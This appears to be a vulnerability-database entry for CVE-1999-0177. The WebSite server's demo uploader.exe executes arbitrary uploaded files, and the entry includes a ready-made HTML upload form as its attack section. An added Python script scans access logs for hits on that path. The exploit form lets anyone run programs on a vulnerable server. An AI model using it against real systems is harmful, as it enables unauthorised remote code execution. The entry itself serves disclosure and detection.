Brief description: O'Reilly's WebSite web server includes a demo package that contains the CGI program uploader.exe. Uploader.exe accepts arbitrary files uploaded by remote users and, if they are executable, executes them on the server.
Full description: The uploader.exe program uploads arbitrary files without checking them. It will then execute them.
Components: Website 1.1 (trusted), Website 2.0beta (untrusted)
Systems: Microsoft Windows (trusted)
Effect(s) of exploiting: Attacker can execute commands with webserver's privileges
Detecting the hole:
Fixing the hole:
Other information:
PA Classification(s):
RISOS Classification(s):
DCS Classification(s):
CVE Number: CVE-1999-0177 -- The uploader program in the WebSite web server allows a remote attacker to execute arbitrary programs.
Attack: Modify the following HTML to include the proper hostname, then plug the desired CGI program into the form:
<center>
<FORM ENCTYPE="multipart/form-data" METHOD=POST ACTION="http://host.of.vulnerable.website/cgi-win/uploader.exe/cgi-win/">
<INPUT TYPE=HIDDEN NAME="name" VALUE="Foo">
<INPUT TYPE=HIDDEN NAME="email" VALUE="Foo@bar.com">
File to upload: <INPUT TYPE=FILE NAME="upl-file" SIZE=40><BR>
<INPUT TYPE=TEXT SIZE=40 NAME="desc" VALUE="YouGottaSecurityProblem">
<INPUT TYPE=SUBMIT VALUE="Upload Now">
</FORM>
</center>
Advisories: ISS X-Force http-website-uploader
Related Vulnerabilities:
Reporting: Herman de Vette (herman@info.nl) in BugTraq Message ID: Pine.SUN.3.94.970904165704.19190B-100000@dfw.dfw.net (Thu, 4 Sep 1997 21:38:57)
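
Added example (not part of the original entry, and not O'Reilly's code): one way to check web server access logs for requests that reach the uploader.exe path used in the form above. It assumes the log is in Common Log Format, which may differ from the server's actual log layout. Paths are percent-decoded and lower-cased before matching because the server runs on Windows, where file names are case-insensitive. The function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumed layout (Common Log Format): host ident user [time] "METHOD target PROTO" status size
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
SCRIPT = "/cgi-win/uploader.exe"  # script path from the form's ACTION in this entry


def normalize(target):
    """Drop the query string, percent-decode, unify slashes, lower-case."""
    path = unquote(target.split("?", 1)[0]).replace("\\", "/").lower()
    return re.sub(r"/{2,}", "/", path)


def find_uploader_hits(lines):
    """Return one dict per log line whose request path reaches uploader.exe."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue
        path = normalize(m["target"])
        if path == SCRIPT or path.startswith(SCRIPT + "/"):
            hits.append({
                "host": m["host"],
                "time": m["time"],
                "method": m["method"],
                "status": int(m["status"]),
                # Text after the script name, as in ACTION=".../uploader.exe/cgi-win/"
                "extra_path": path[len(SCRIPT):],
                # A POST answered with 2xx is the entry to investigate first.
                "accepted_post": m["method"] == "POST" and m["status"].startswith("2"),
            })
    return hits


# Constructed sample log lines (not from a real server).
SAMPLE = [
    '192.0.2.10 - - [04/Sep/1997:21:40:01 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.77 - - [04/Sep/1997:21:41:12 +0000] "POST /cgi-win/uploader.exe/cgi-win/ HTTP/1.0" 200 312',
    '192.0.2.77 - - [04/Sep/1997:21:41:30 +0000] "GET /CGI-WIN/%55ploader.EXE HTTP/1.0" 200 880',
    '192.0.2.12 - - [04/Sep/1997:21:42:00 +0000] "GET /cgi-win/uploader.exe.bak HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for hit in find_uploader_hits(SAMPLE):
        print(hit)
```

Any hit means the demo program is still installed and reachable; a hit with accepted_post set is the one to follow up by reviewing what was written to the server around that time.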